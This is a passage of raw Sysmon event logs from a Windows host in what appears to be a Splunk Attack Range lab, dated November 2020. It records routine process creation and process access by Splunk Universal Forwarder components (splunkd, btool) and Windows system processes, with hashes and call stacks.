Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001771Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.935{D28789B6-7C74-5FA1-4600-000000008801}4088C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7C74-5FA1-4500-000000008801}4076C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000001770Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C74-5FA1-4500-000000008801}4076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001769Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001768Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001767Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001766Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001765Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001764Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001763Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001762Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001761Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001760Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C74-5FA1-4500-000000008801}4076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001759Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C74-5FA1-4100-000000008801}40004004C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7C74-5FA1-4500-000000008801}4076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001758Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.930{D28789B6-7C74-5FA1-4500-000000008801}4076C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C74-5FA1-4100-000000008801}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001757Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.864{D28789B6-7C74-5FA1-4400-000000008801}40524056C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001756Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C74-5FA1-4400-000000008801}4052C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001755Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001754Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001753Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001752Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001751Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001750Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001749Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001748Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001747Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C74-5FA1-4400-000000008801}4052C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001746Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001745Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C74-5FA1-4300-000000008801}40324036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7C74-5FA1-4400-000000008801}4052C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001744Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.621{D28789B6-7C74-5FA1-4400-000000008801}4052C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program 